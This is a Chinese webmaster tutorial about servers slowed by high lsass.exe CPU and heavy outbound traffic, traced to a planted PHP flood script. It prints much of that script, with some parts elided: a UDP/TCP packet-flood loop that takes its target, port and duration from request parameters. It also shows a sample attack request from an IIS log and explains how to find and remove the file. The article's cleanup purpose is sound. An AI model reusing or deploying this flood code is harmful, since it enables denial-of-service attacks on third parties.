您当前的位置: 首页 > 网站编程 > PHP教程 > lsass.exe进程CPU使用率异常

lsass.exe进程CPU使用率异常

作者:不详 来源:网络 发布时间: 2014-07-15 22:30 点击:
近期有几台服务器相继出现 lsass.exe 占用CPU过高,也不算太高,而且过了一段时间又会恢复正常,CPU过高直接造成网站打开很慢,周而反复。 在CPU跑高的时候,伴随着一个现像就是网络的浮动,有时候上传居然达到了30M - 90M/s, 对外攻击,第一时间就想到有可能是这个原

lsass.exe进程CPU使用率异常

  近期有几台服务器相继出现 lsass.exe 占用CPU过高,也不算太高,而且过了一段时间又会恢复正常,CPU过高直接造成网站打开很慢,周而反复。

  在CPU跑高的时候,伴随着一个现像就是网络的浮动,有时候上传居然达到了30M - 90M/s,

  对外攻击,第一时间就想到有可能是这个原因,那具体怎么查呢?

  常见的对外文件,这东西网上搜一下就能找到。

  <?php

  set_time_limit(86400);

  ignore_user_abort(True);

  $packets = 0;

  $http = $_REQUEST['http'];

  $rand = $_REQUEST['exit'];

  $exec_time = $_REQUEST['time'];

  ........

  echo $_REQUEST['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_REQUEST['rat'];

  exit;

  }

  echo "Php 2012 Terminator";

  exit;

  }

  http://web100.cc

  for($i=0;$i<65535;$i++)

  {

  $out .= "X";

  }

  /........

  }

  $fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5);

  if($fp)

  {

  fwrite($fp, $out);

  fclose($fp);

  }

  }

  else

  if($rand==500)

  while(1)

  {

  $packets++;

  if(time() > $max_time){

  break;

  }

  $fp = pfsockopen("udp://$http", $rand, $errno, $errstr, 5);

  if($fp)

  {

  fwrite($fp, $out);

  fclose($fp);

  }

  }

  else

  while(1)

  {

  $packets++;

  if(time() > $max_time){

  break;

  }

  $fp = pfsockopen("tcp://$http", $rand, $errno, $errstr, 5);

  if($fp)

  {

  fwrite($fp, $out);

  fclose($fp);

  }

  }

  ?>

  那要如何定位到是哪个站呢?

  你可以打开日志

  C:WindowsSystem32LogFilesHTTPERRhttperr...log,打开今天时间的文件,

  里面有类似这样的记录:

  2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1

  最后三项 783 Disabled 30_FreeHost_1

  783就是这个站在IIS中的ID

  30_FreeHost_1就是所在池

  解决办法:

  找到这个站点,接下来想要解决就好办了,如果条件允许,可以直接禁用掉fsockopen这个函数,当然这个大部份情况下是不适用的。

  那就去这个站点的根止录下找找吧。

  $fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5);

  可以借助一些工具,查找上面这句话,或是查找$fp = fsockopen,这样其本上攻击文件就无所遁形了,当然不要删除了正常的邮件发送文件,最后重启下服务,嗯,不卡了。
分享到:
本文"lsass.exe进程CPU使用率异常"由远航站长收集整理而来,仅供大家学习与参考使用。更多网站制作教程尽在远航站长站。
顶一下
(0)
0%
踩一下
(0)
0%
[点击 次] [返回上一页] [打印]
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
用户名: 密码: 验证码:
关于本站 - 联系我们 - 网站声明 - 友情连接- 网站地图 - 站点地图 - 返回顶部
Copyright © 2007-2013 www.yhzhan.com(远航站长). All Rights Reserved .
远航站长:为中小站长提供最佳的学习与交流平台,提供网页制作与网站编程等各类网站制作教程.
官方QQ:445490277 网站群:26680406 网站备案号:豫ICP备07500620号-4